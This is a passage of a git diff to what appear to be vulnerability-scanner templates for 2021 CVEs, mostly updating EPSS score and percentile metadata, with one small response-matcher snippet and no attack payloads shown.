cve-id: CVE-2021-21816 cwe-id: CWE-200 epss-score: 0.00255 - epss-percentile: 0.63209 + epss-percentile: 0.63241 cpe: cpe:2.3:o:dlink:dir-3040_firmware:1.13b03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 26ffa1c6fc..d4776d87d6 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-21978 cwe-id: CWE-20 epss-score: 0.97399 - epss-percentile: 0.99895 + epss-percentile: 0.99896 cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 51c3bea2f5..aab7adfd3d 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-21985 cwe-id: CWE-20 epss-score: 0.9737 - epss-percentile: 0.99872 + epss-percentile: 0.99873 cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index 50f2be0563..a8063d2097 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-22005 cwe-id: CWE-22 epss-score: 0.97096 - epss-percentile: 0.99699 + epss-percentile: 0.997 cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index ae3168d585..415dddc929 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-22053 cwe-id: CWE-94 epss-score: 0.63177 - epss-percentile: 0.97476 + epss-percentile: 0.97478 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 8c35eb5710..717e4d82d9 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-22054 cwe-id: CWE-918 epss-score: 0.72885 - epss-percentile: 0.97749 + epss-percentile: 0.9775 cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index bdf075fefc..2bea5ffc32 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-22122 cwe-id: CWE-79 epss-score: 0.00609 - epss-percentile: 0.76263 + epss-percentile: 0.76285 cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index dc18d55aaa..07a9f16756 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-22707 cwe-id: CWE-798 epss-score: 0.3812 - epss-percentile: 0.96785 + epss-percentile: 0.96787 cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index 1a04452c7f..fa58a16b76 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00922 - epss-percentile: 0.81182 + epss-percentile: 0.81193 cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 6e54be6056..5c78877fef 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-22911 cwe-id: CWE-75,NVD-CWE-Other epss-score: 0.94897 - epss-percentile: 0.99047 + epss-percentile: 0.99048 cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index b280b49e47..f5e1cc4246 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-23241 cwe-id: CWE-22 epss-score: 0.00365 - epss-percentile: 0.69355 + epss-percentile: 0.69381 cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 7b8c360610..d992b28e58 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24145 cwe-id: CWE-434 epss-score: 0.93499 - epss-percentile: 0.98825 + epss-percentile: 0.98826 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index f8cc2a2ac0..4cb2fcd9df 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 epss-score: 0.0212 - epss-percentile: 0.87969 + epss-percentile: 0.87974 cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 58182cb331..1c1394a2ea 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24150 cwe-id: CWE-918 epss-score: 0.03142 - epss-percentile: 0.90009 + epss-percentile: 0.90014 cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index d8e147047d..4cc61843ef 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24155 cwe-id: CWE-434 epss-score: 0.94459 - epss-percentile: 0.98981 + epss-percentile: 0.98982 cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index 3b63955a17..c1413cb4f0 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24165 cwe-id: CWE-601 epss-score: 0.00116 - epss-percentile: 0.45123 + epss-percentile: 0.45139 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 22478d482c..68e1eb4e4a 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.00183 - epss-percentile: 0.55413 + epss-percentile: 0.55435 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index fedb7ca0ac..e3d98c4004 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24176 cwe-id: CWE-79 epss-score: 0.00136 - epss-percentile: 0.48771 + epss-percentile: 0.48787 cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 5f965ec3eb..379d1a3d5b 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24210 cwe-id: CWE-601 epss-score: 0.00116 - epss-percentile: 0.45123 + epss-percentile: 0.45139 cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index f818200acf..7bb14c98e9 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.00369 - epss-percentile: 0.69528 + epss-percentile: 0.69555 cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24215.yaml b/http/cves/2021/CVE-2021-24215.yaml index d5f12e4bf6..7b385b84fe 100644 --- a/http/cves/2021/CVE-2021-24215.yaml +++ b/http/cves/2021/CVE-2021-24215.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24215 - cwe-id: CWE-284,CWE-425 + cwe-id: CWE-425,CWE-284 epss-score: 0.07303 - epss-percentile: 0.93322 + epss-percentile: 0.93328 cpe: cpe:2.3:a:wpruby:controlled_admin_access:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -49,4 +49,5 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "This page allows direct access to your site settings") && contains(body_2, "Controlled Admin Access")' condition: and -# digest: 4a0a00473045022100c2ba28c5827f969098c69b767d837f405c1062acee1a2d73b8ccc29f98bf2b3b02206a9f1df7d0e7eff532109c49d47683be530a04f2a3aa1605bbd07f23b1c09ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c2ba28c5827f969098c69b767d837f405c1062acee1a2d73b8ccc29f98bf2b3b02206a9f1df7d0e7eff532109c49d47683be530a04f2a3aa1605bbd07f23b1c09ac8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index bef07d2619..8cae3b798f 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24226 cwe-id: CWE-200 epss-score: 0.03501 - epss-percentile: 0.90467 + epss-percentile: 0.90475 cpe: cpe:2.3:a:accessally:accessally:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 9e5f698419..758f866119 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24227 cwe-id: CWE-200 epss-score: 0.03493 - epss-percentile: 0.90459 + epss-percentile: 0.90466 cpe: cpe:2.3:a:patreon:patreon_wordpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 2b12f93830..5ac5a3dd3b 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24235 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:boostifythemes:goto:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 6526dd4320..9ea0a799b4 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -19,7 +19,7 @@ info: cve-id: "CVE-2021-24236" cwe-id: CWE-434 epss-score: 0.14539 - epss-percentile: 0.95133 + epss-percentile: 0.95136 cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml index 218f3550f5..cf4d6cd2af 100644 --- a/http/cves/2021/CVE-2021-24237.yaml +++ b/http/cves/2021/CVE-2021-24237.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24237 cwe-id: CWE-79 epss-score: 0.00374 - epss-percentile: 0.69708 + epss-percentile: 0.69734 cpe: cpe:2.3:a:purethemes:findeo:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml index 8200747ec3..ae54f0e6a2 100644 --- a/http/cves/2021/CVE-2021-24239.yaml +++ b/http/cves/2021/CVE-2021-24239.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24239 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45123 + epss-percentile: 0.45139 cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24245.yaml b/http/cves/2021/CVE-2021-24245.yaml index 353f3982b8..22de86eee5 100644 --- a/http/cves/2021/CVE-2021-24245.yaml +++ b/http/cves/2021/CVE-2021-24245.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24245 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54724 + epss-percentile: 0.54749 cpe: cpe:2.3:a:trumani:stop_spammers:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24274.yaml b/http/cves/2021/CVE-2021-24274.yaml index bbd4410e5c..d580f8d645 100644 --- a/http/cves/2021/CVE-2021-24274.yaml +++ b/http/cves/2021/CVE-2021-24274.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24274 cwe-id: CWE-79 epss-score: 0.00147 - epss-percentile: 0.50531 + epss-percentile: 0.50555 cpe: cpe:2.3:a:supsystic:ultimate_maps:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24275.yaml b/http/cves/2021/CVE-2021-24275.yaml index 8394274cfe..5f5ddd4799 100644 --- a/http/cves/2021/CVE-2021-24275.yaml +++ b/http/cves/2021/CVE-2021-24275.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24275 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54724 + epss-percentile: 0.54749 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24276.yaml b/http/cves/2021/CVE-2021-24276.yaml index 39c9614671..04eca962b2 100644 --- a/http/cves/2021/CVE-2021-24276.yaml +++ b/http/cves/2021/CVE-2021-24276.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24276 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54724 + epss-percentile: 0.54749 cpe: cpe:2.3:a:supsystic:contact_form:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index d8e69b2ef4..553b48416a 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24278 cwe-id: CWE-863 epss-score: 0.07978 - epss-percentile: 0.93568 + epss-percentile: 0.93573 cpe: cpe:2.3:a:querysol:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index edc152c90c..81aed69b38 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-24284 cwe-id: CWE-434 epss-score: 0.96885 - epss-percentile: 0.99607 + epss-percentile: 0.99609 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index ea61e2ce22..a0c517cebc 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24285 cwe-id: CWE-89 epss-score: 0.12626 - epss-percentile: 0.94848 + epss-percentile: 0.9485 cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24286.yaml b/http/cves/2021/CVE-2021-24286.yaml index 8c4eb766d2..eca64c8dad 100644 --- a/http/cves/2021/CVE-2021-24286.yaml +++ b/http/cves/2021/CVE-2021-24286.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24286 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54724 + epss-percentile: 0.54749 cpe: cpe:2.3:a:mooveagency:redirect_404_to_parent:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24287.yaml b/http/cves/2021/CVE-2021-24287.yaml index d9c25afc7b..253c578620 100644 --- a/http/cves/2021/CVE-2021-24287.yaml +++ b/http/cves/2021/CVE-2021-24287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24287 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54724 + epss-percentile: 0.54749 cpe: cpe:2.3:a:mooveagency:select_all_categories_and_taxonomies\,_change_checkbox_to_radio_buttons:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24288.yaml b/http/cves/2021/CVE-2021-24288.yaml index 66da585e4b..53f565db5e 100644 --- a/http/cves/2021/CVE-2021-24288.yaml +++ b/http/cves/2021/CVE-2021-24288.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24288 cwe-id: CWE-601 epss-score: 0.0015 - epss-percentile: 0.51015 + epss-percentile: 0.51041 cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24291.yaml b/http/cves/2021/CVE-2021-24291.yaml index 76df7e3c3d..a9462975d5 100644 --- a/http/cves/2021/CVE-2021-24291.yaml +++ b/http/cves/2021/CVE-2021-24291.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24291 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.35633 + epss-percentile: 0.35646 cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24298.yaml b/http/cves/2021/CVE-2021-24298.yaml index 4021ba56e2..ae0e35d718 100644 --- a/http/cves/2021/CVE-2021-24298.yaml +++ b/http/cves/2021/CVE-2021-24298.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24298 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:ibenic:simple_giveaways:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24300.yaml b/http/cves/2021/CVE-2021-24300.yaml index 0b754dd78d..4e06d678fa 100644 --- a/http/cves/2021/CVE-2021-24300.yaml +++ b/http/cves/2021/CVE-2021-24300.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24300 cwe-id: CWE-79 epss-score: 0.00302 - epss-percentile: 0.66198 + epss-percentile: 0.66232 cpe: cpe:2.3:a:pickplugins:product_slider_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24316.yaml b/http/cves/2021/CVE-2021-24316.yaml index 305b8c8e72..ce5e019d31 100644 --- a/http/cves/2021/CVE-2021-24316.yaml +++ b/http/cves/2021/CVE-2021-24316.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24316 cwe-id: CWE-79 epss-score: 0.00246 - epss-percentile: 0.62367 + epss-percentile: 0.62395 cpe: cpe:2.3:a:wowthemes:mediumish:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24320.yaml b/http/cves/2021/CVE-2021-24320.yaml index 5bb016c39e..aa3cd3e5ec 100644 --- a/http/cves/2021/CVE-2021-24320.yaml +++ b/http/cves/2021/CVE-2021-24320.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24320 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45134 + epss-percentile: 0.4515 cpe: cpe:2.3:a:bold-themes:bello:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24335.yaml b/http/cves/2021/CVE-2021-24335.yaml index ac7d4ec562..be1fea3dc9 100644 --- a/http/cves/2021/CVE-2021-24335.yaml +++ b/http/cves/2021/CVE-2021-24335.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24335 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52788 + epss-percentile: 0.52815 cpe: cpe:2.3:a:smartdatasoft:car_repair_services_\&_auto_mechanic:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 3e6c94b524..bffbf0e3ce 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24340 cwe-id: CWE-89 epss-score: 0.0287 - epss-percentile: 0.89611 + epss-percentile: 0.89617 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24342.yaml b/http/cves/2021/CVE-2021-24342.yaml index 3d509a49cc..fbd075b731 100644 --- a/http/cves/2021/CVE-2021-24342.yaml +++ b/http/cves/2021/CVE-2021-24342.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24342 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41323 + epss-percentile: 0.41347 cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index 46373214b5..209369b2d4 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24351 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50128 + epss-percentile: 0.50151 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index 5f92052dbb..b3df7d3d49 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24358 cwe-id: CWE-601 epss-score: 0.00255 - epss-percentile: 0.63182 + epss-percentile: 0.63211 cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-24364.yaml b/http/cves/2021/CVE-2021-24364.yaml index 11c620677b..5fce7d559a 100644 --- a/http/cves/2021/CVE-2021-24364.yaml +++ b/http/cves/2021/CVE-2021-24364.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24364 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41323 + epss-percentile: 0.41347 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index 6cc6334bb0..37c62f736a 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-24370 cwe-id: CWE-434 - epss-score: 0.11344 - epss-percentile: 0.94596 + epss-score: 0.10577 + epss-percentile: 0.94404 cpe: cpe:2.3:a:radykal:fancy_product_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24387.yaml b/http/cves/2021/CVE-2021-24387.yaml index 063f2f9473..a219d6693d 100644 --- a/http/cves/2021/CVE-2021-24387.yaml +++ b/http/cves/2021/CVE-2021-24387.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-24387 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50128 + epss-percentile: 0.50151 cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24389.yaml b/http/cves/2021/CVE-2021-24389.yaml index 8c135745b4..1d999b22c3 100644 --- a/http/cves/2021/CVE-2021-24389.yaml +++ b/http/cves/2021/CVE-2021-24389.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24389 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.52119 + epss-percentile: 0.52143 cpe: cpe:2.3:a:chimpgroup:foodbakery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24406.yaml b/http/cves/2021/CVE-2021-24406.yaml index 25cd9bfac1..4e22b9fbce 100644 --- a/http/cves/2021/CVE-2021-24406.yaml +++ b/http/cves/2021/CVE-2021-24406.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24406 cwe-id: CWE-601 epss-score: 0.0015 - epss-percentile: 0.51015 + epss-percentile: 0.51041 cpe: cpe:2.3:a:gvectors:wpforo_forum:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24407.yaml b/http/cves/2021/CVE-2021-24407.yaml index 9f946bcff0..af60f658ef 100644 --- a/http/cves/2021/CVE-2021-24407.yaml +++ b/http/cves/2021/CVE-2021-24407.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24407 cwe-id: CWE-79 epss-score: 0.00161 - epss-percentile: 0.52555 + epss-percentile: 0.52581 cpe: cpe:2.3:a:tielabs:jannah:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index afed412c14..ee0898f240 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-24409 cwe-id: CWE-79 epss-score: 0.00188 - epss-percentile: 0.56085 + epss-percentile: 0.5611 cpe: cpe:2.3:a:plugin-planet:prismatic:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index 431e5553e8..33c9af6941 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24435 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.49356 + epss-percentile: 0.49373 cpe: cpe:2.3:a:gambit:titan_framework:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-24436.yaml b/http/cves/2021/CVE-2021-24436.yaml index d604bbd665..93917ed33a 100644 --- a/http/cves/2021/CVE-2021-24436.yaml +++ b/http/cves/2021/CVE-2021-24436.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-24436 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40941 + epss-percentile: 0.40964 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git 